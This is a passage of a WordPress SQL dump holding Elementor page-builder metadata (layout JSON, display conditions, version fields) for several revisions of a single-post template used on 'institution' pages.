fa-plus\",\"library\":\"fa-solid\"},\"color_menu_item\":\"#11AD14\",\"color_menu_item_hover\":\"#0A3C11\",\"padding_horizontal_menu_item\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"menu_space_between\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(26880,3918,'_elementor_conditions','a:4:{i:0;s:28:\"include/singular/institution\";i:1;s:41:\"include/singular/in_institutions_category\";i:2;s:50:\"include/singular/in_institutions_category_children\";i:3;s:38:\"include/singular/institution_by_author\";}'),(26881,3918,'_elementor_page_settings','a:2:{s:12:\"preview_type\";s:18:\"single/institution\";s:10:\"preview_id\";s:4:\"1582\";}'),(26885,3919,'_elementor_edit_mode','builder'),(26886,3919,'_elementor_template_type','single-post'),(26887,3919,'_elementor_version','3.4.0'),(26888,3919,'_elementor_pro_version','3.3.6'),(26889,3919,'_wp_page_template','default'),(26890,3919,'_elementor_data','[{\"id\":\"12002fa\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"090d30d\"}]},\"elements\":[{\"id\":\"c8cd4ba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"d4bec19\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"cc70076\"}],\"structure\":\"20\"},\"elements\":[{\"id\":\"4aa672a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":74.269,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b15ea6e\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"title\":\"[elementor-tag id=\\\"\\\" name=\\\"post-title\\\" settings=\\\"%7B%22before%22%3A%22%22%2C%22after%22%3A%22%22%2C%22fallback%22%3A%22%22%7D\\\"]\"},\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#0A3C11\"},\"elements\":[],\"widgetType\":\"theme-post-title\"},{\"id\":\"9099e3a\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"post-featured-image\\\" settings=\\\"%7B%22fallback%22%3A%7B%22url%22%3A%22%22%2C%22id%22%3A%22%22%7D%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"theme-post-featured-image\"},{\"id\":\"44d8a81\",\"elType\":\"widget\",\"settings\":{\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\"},\"elements\":[],\"widgetType\":\"theme-post-content\"}],\"isInner\":true},{\"id\":\"f1c39ee\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":25.676,\"background_background\":\"classic\",\"background_color\":\"#FFFFFF\"},\"elements\":[{\"id\":\"6e47c97\",\"elType\":\"widget\",\"settings\":{\"link_to\":\"custom\",\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"204b950\\\" name=\\\"pods-image\\\" settings=\\\"%7B%22key%22%3A%22institution%3A714%3Ainstitution_logo%22%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"7380147\\\" name=\\\"Pods-url\\\" settings=\\\"%7B%22key%22%3A%22institution%3A714%3Ainternet%22%7D\\\"]\"},\"image_size\":\"thumbnail\",\"link\":{\"url\":\"\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"26ac35b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Existing System\",\"align\":\"center\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"1\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"47c6b38\",\"elType\":\"widget\",\"settings\":{\"menu\":\"external_data_menu\",\"layout\":\"vertical\",\"align_items\":\"left\",\"pointer\":\"none\",\"submenu_icon\":{\"value\":\"fas fa-plus\",\"library\":\"fa-solid\"},\"color_menu_item\":\"#11AD14\",\"color_menu_item_hover\":\"#0A3C11\",\"padding_horizontal_menu_item\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"menu_space_between\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(26892,3919,'_elementor_conditions','a:4:{i:0;s:28:\"include/singular/institution\";i:1;s:41:\"include/singular/in_institutions_category\";i:2;s:50:\"include/singular/in_institutions_category_children\";i:3;s:38:\"include/singular/institution_by_author\";}'),(26893,3919,'_elementor_page_settings','a:2:{s:12:\"preview_type\";s:18:\"single/institution\";s:10:\"preview_id\";s:4:\"1582\";}'),(26897,3920,'_elementor_edit_mode','builder'),(26898,3920,'_elementor_template_type','single-post'),(26899,3920,'_elementor_version','3.4.0'),(26900,3920,'_elementor_pro_version','3.3.6'),(26901,3920,'_wp_page_template','default'),(26902,3920,'_elementor_data','[{\"id\":\"12002fa\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"090d30d\"}]},\"elements\":[{\"id\":\"c8cd4ba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"d4bec19\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"cc70076\"}],\"structure\":\"20\"},\"elements\":[{\"id\":\"4aa672a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":74.269,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b15ea6e\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"title\":\"[elementor-tag id=\\\"\\\" name=\\\"post-title\\\" settings=\\\"%7B%22before%22%3A%22%22%2C%22after%22%3A%22%22%2C%22fallback%22%3A%22%22%7D\\\"]\"},\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"theme-post-title\"},{\"id\":\"9099e3a\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"post-featured-image\\\" settings=\\\"%7B%22fallback%22%3A%7B%22url%22%3A%22%22%2C%22id%22%3A%22%22%7D%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"theme-post-featured-image\"},{\"id\":\"44d8a81\",\"elType\":\"widget\",\"settings\":{\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\"},\"elements\":[],\"widgetType\":\"theme-post-content\"}],\"isInner\":true},{\"id\":\"f1c39ee\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":25.676,\"background_background\":\"classic\",\"background_color\":\"#FFFFFF\"},\"elements\":[{\"id\":\"6e47c97\",\"elType\":\"widget\",\"settings\":{\"link_to\":\"custom\",\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"204b950\\\" name=\\\"pods-image\\\" settings=\\\"%7B%22key%22%3A%22institution%3A714%3Ainstitution_logo%22%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"7380147\\\" name=\\\"Pods-url\\\" settings=\\\"%7B%22key%22%3A%22institution%3A714%3Ainternet%22%7D\\\"]\"},\"image_size\":\"thumbnail\",\"link\":{\"url\":\"\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"26ac35b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Existing System\",\"align\":\"center\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"1\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"47c6b38\",\"elType\":\"widget\",\"settings\":{\"menu\":\"external_data_menu\",\"layout\":\"vertical\",\"align_items\":\"left\",\"pointer\":\"none\",\"submenu_icon\":{\"value\":\"fas fa-plus\",\"library\":\"fa-solid\"},\"color_menu_item\":\"#11AD14\",\"color_menu_item_hover\":\"#0A3C11\",\"padding_horizontal_menu_item\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"menu_space_between\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(26904,3920,'_elementor_conditions','a:4:{i:0;s:28:\"include/singular/institution\";i:1;s:41:\"include/singular/in_institutions_category\";i:2;s:50:\"include/singular/in_institutions_category_children\";i:3;s:38:\"include/singular/institution_by_author\";}'),(26905,3920,'_elementor_page_settings','a:2:{s:12:\"preview_type\";s:18:\"single/institution\";s:10:\"preview_id\";s:4:\"1582\";}'),(26908,3921,'_elementor_edit_mode','builder'),(26909,3921,'_elementor_template_type','single-post'),(26910,3921,'_elementor_version','3.4.0'),(26911,3921,'_elementor_pro_version','3.3.6'),(26912,3921,'_wp_page_template','default'),(26913,3921,'_elementor_data','[{\"id\":\"12002fa\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"090d30d\"}]},\"elements\":[{\"id\":\"c8cd4ba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"d4bec19\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"cc70076\"}],\"structure\":\"20\"},\"elements\":[{\"id\":\"4aa672a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":74.269,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b15ea6e\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"title\":\"[elementor-tag id=\\\"\\\" name=\\\"post-title\\\" settings=\\\"%7B%22before%22%3A%22%22%2C%22after%22%3A%22%22%2C%22fallback%22%3A%22%22%7D\\\"]\"},\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"theme-post-title\"},{\"id\":\"9099e3a\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"post-featured-image\\\" settings=\\\"%7B%22fallback%22%3A%7B%22url%22%3A%22%22%2C%22id%22%3A%22%22%7D%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"theme-post-featured-image\"},{\"id\":\"44d8a81\",\"elType\":\"widget\",\"settings\":{\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\"},\"elements\":[],\"widgetType\":\"theme-post-content\"}],\"isInner\":true},{\"id\":\"f1c39ee\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":25.676,\"background_background\":\"classic\",\"background_color\":\"#FFFFFF8A\"},\"elements\":[{\"id\":\"6e47c97\",\"elType\":\"widget\",\"settings\":{\"link_to\":\"custom\",\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"204b950\\\" name=\\\"pods-image\\\" settings=\\\"%7B%22key%22%3A%22institution%3A714%3Ainstitution_logo%22%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"7380147\\\" name=\\\"Pods-url\\\" settings=\\\"%7B%22key%22%3A%22institution%3A714%3Ainternet%22%7D\\\"]\"},\"image_size\":\"thumbnail\",\"link\":{\"url\":\"\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"26ac35b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Existing System\",\"align\":\"center\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"1\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"47c6b38\",\"elType\":\"widget\",\"settings\":{\"menu\":\"external_data_menu\",\"layout\":\"vertical\",\"align_items\":\"left\",\"pointer\":\"none\",\"submenu_icon\":{\"value\":\"fas fa-plus\",\"library\":\"fa-solid\"},\"color_menu_item\":\"#11AD14\",\"color_menu_item_hover\":\"#0A3C11\",\"padding_horizontal_menu_item\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"menu_space_between\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(26915,3921,'_elementor_conditions','a:4:{i:0;s:28:\"include/singular/institution\";i:1;s:41:\"include/singular/in_institutions_category\";i:2;s:50:\"include/singular/in_institutions_category_children\";i:3;s:38:\"include/singular/institution_by_author\";}'),(26916,3921,'_elementor_page_settings','a:2:{s:12:\"preview_type\";s:18:\"single/institution\";s:10:\"preview_id\";s:4:\"1582\";}'),(26918,3922,'_elementor_edit_mode','builder'),(26919,3922,'_elementor_template_type','single-post'),(26920,3922,'_elementor_version','3.4.0'),(26921,3922,'_elementor_pro_version','3.3.6'),(26922,3922,'_wp_page_template','default'),(26923,3922,'_elementor_data','[{\"id\":\"12002fa\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"090d30d\"}],\"background_background\":\"classic\",\"background_color\":\"#FFFFFFA8\"},\"elements\":[{\"id\":\"c8cd4ba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"d4bec19\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"cc70076\"}],\"structure\":\"20\"},\"elements\":[{\"id\":\"4aa672a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":74.269,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b15ea6e\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"title\":\"[elementor-tag id=\\\"\\\" name=\\\"post-title\\\" settings=\\\"%7B%22before%22%3A%22%22%2C%22after%22%3A%22%22%2C%22fallback%22%3A%22%22%7D\\\"]\"},\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"theme-post-title\"},{\"id\":\"9099e3a\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"post-featured-image\\\" settings=\\\"%7B%22fallback%22%3A%7B%22url%22%3A%22%22%2C%22id%22%3A%22%22%7D%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"theme-post-featured-image\"},{\"id\":\"44d8a81\",\"elType\":\"widget\",\"settings\":{\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\"},\"elements\":[],\"widgetType\":\"theme-post-content\"}],\"isInner\":true},{\"id\":\"f1c39ee\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":25.676,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"6e47c97\",\"elType\":\"widget\",\"settings\":{\"link_to\":\"custom\",\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"204b950\\\" name=\\\"pods-image\\\" settings=\\\"%7B%22key%22%3A%22institution%3A714%3Ainstitution_logo%22%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"7380147\\\" name=\\\"Pods-url\\\" settings=\\\"%7B%22key%22%3A%22institution%3A714%3Ainternet%22%7D\\\"]\"},\"image_size\":\"thumbnail\",\"link\":{\"url\":\"\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"26ac35b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Existing System\",\"align\":\"center\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"1\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"47c6b38\",\"elType\":\"widget\",\"settings\":{\"menu\":\"external_data_menu\",\"layout\":\"vertical\",\"align_items\":\"left\",\"pointer\":\"none\",\"submenu_icon\":{\"value\":\"fas fa-plus\",\"library\":\"fa-solid\"},\"color_menu_item\":\"#11AD14\",\"color_menu_item_hover\":\"#0A3C11\",\"padding_horizontal_menu_item\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"menu_space_between\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(26925,3922,'_elementor_conditions','a:4:{i:0;s:28:\"include/singular/institution\";i:1;s:41:\"include/singular/in_institutions_category\";i:2;s:50:\"include/singular/in_institutions_category_children\";i:3;s:38:\"include/singular/institution_by_author\";}'),(26926,3922,'_elementor_page_settings','a:2:{s:12:\"preview_type\";s:18:\"single/institution\";s:10:\"preview_id\";s:4:\"1582\";}'),(26929,3923,'_elementor_edit_mode','builder'),(26930,3923,'_elementor_template_type','single-post'),(26931,3923,'_elementor_version','3.4.0'),(26932,3923,'_elementor_pro_version','3.3.6'),(26933,3923,'_wp_page_template','default'),(26934,3923,'_elementor_data','[{\"id\":\"12002fa\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"090d30d\"}],\"background_background\":\"classic\"},\"elements\":[{\"id\":\"c8cd4ba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"d4bec19\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"cc70076\"}],\"structure\":\"20\"},\"elements\":[{\"id\":\"4aa672a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":74.269,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b15ea6e\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"title\":\"[elementor-tag id=\\\"\\\" name=\\\"post-title\\\" settings=\\\"%7B%22before%22%3A%22%22%2C%22after%22%3A%22%22%2C%22fallback%22%3A%22%22%7D\\\"]\"},\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"theme-post-title\"},{\"id\":\"9099e3a\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"post-featured-image\\\" settings=\\\"%7B%22fallback%22%3A%7B%22url%22%3A%22%22%2C%22id%22%3A%22%22%7D%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"theme-post-featured-image\"},{\"id\":\"44d8a81\",\"elType\":\"widget\",\"settings\":{\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\"},\"elements\":[],\"widgetType\":\"theme-post-content\"}],\"isInner\":true},{\"id\":\"f1c39ee\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":25.676,\"background_background\":\"classic\",\"background_color\":\"#FFFFFFA8\"},\"elements\":[{\"id\":\"6e47c97\",\"elType\":\"widget\",\"settings\":{\"link_to\":\"custom\",\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"204b950\\\" name=\\\"pods-image\\\" settings=\\\"%7B%22key%22%3A%22institution%3A714%3Ainstitution_logo%22%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"7380147\\\" name=\\\"Pods-url\\\" settings=\\\"%7B%22key%22%3A%22institution%3A714%3Ainternet%22%7D\\\"]\"},\"image_size\":\"thumbnail\",\"link\":{\"url\":\"\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"26ac35b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Existing System\",\"align\":\"center\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"1\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"47c6b38\",\"elType\":\"widget\",\"settings\":{\"menu\":\"external_data_menu\",\"layout\":\"vertical\",\"align_items\":\"left\",\"pointer\":\"none\",\"submenu_icon\":{\"value\":\"fas fa-plus\",\"library\":\"fa-solid\"},\"color_menu_item\":\"#11AD14\",\"color_menu_item_hover\":\"#0A3C11\",\"padding_horizontal_menu_item\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"menu_space_between\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(26936,3923,'_elementor_conditions','a:4:{i:0;s:28:\"include/singular/institution\";i:1;s:41:\"include/singular/in_institutions_category\";i:2;s:50:\"include/singular/in_institutions_category_children\";i:3;s:38:\"include/singular/institution_by_author\";}'),(26937,3923,'_elementor_page_settings','a:2:{s:12:\"preview_type\";s:18:\"single/institution\";s:10:\"preview_id\";s:4:\"1582\";}'),(26940,3924,'_elementor_edit_mode','builder'),(26941,3924,'_elementor_template_type','single-post'),(26942,3924,'_elementor_version','3.4.0'),(26943,3924,'_elementor_pro_version','3.3.6'),(26944,3924,'_wp_page_template','default'),(26945,3924,'_elementor_data','[{\"id\":\"12002fa\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"090d30d\"}],\"background_background\":\"classic\"},\"elements\":[{\"id\":\"c8cd4ba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"d4bec19\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"cc70076\"}],\"structure\":\"20\"},\"elements\":[{\"id\":\"4aa672a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":74.269,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b15ea6e\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"title\":\"[elementor-tag id=\\\"\\\" name=\\\"post-title\\\" settings=\\\"%7B%22before%22%3A%22%22%2C%22after%22%3A%22%22%2C%22fallback%22%3A%22%22%7D\\\"]\"},\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"theme-post-title\"},{\"id\":\"9099e3a\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"post-featured-image\\\" settings=\\\"%7B%22fallback%22%3A%7B%22url%22%3A%22%22%2C%22id%22%3A%22%22%7D%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"theme-post-featured-image\"},{\"id\":\"44d8a81\",\"elType\":\"widget\",\"settings\":{\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\"},\"elements\":[],\"widgetType\":\"theme-post-content\"}],\"isInner\":true},{\"id\":\"f1c39ee\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":25.676,\"background_background\":\"classic\",\"background_color\":\"#FFFFFFA8\"},\"elements\":[{\"id\":\"6e47c97\",\"elType\":\"widget\",\"settings\":{\"link_to\":\"custom\",\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"204b950\\\" name=\\\"pods-image\\\" settings=\\\"%7B%22key%22%3A%22institution%3A714%3Ainstitution_logo%22%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"7380147\\\" name=\\\"Pods-url\\\" settings=\\\"%7B%22key%22%3A%22institution%3A714%3Ainternet%22%7D\\\"]\"},\"image_size\":\"thumbnail\",\"link\":{\"url\":\"\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"26ac35b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Existing 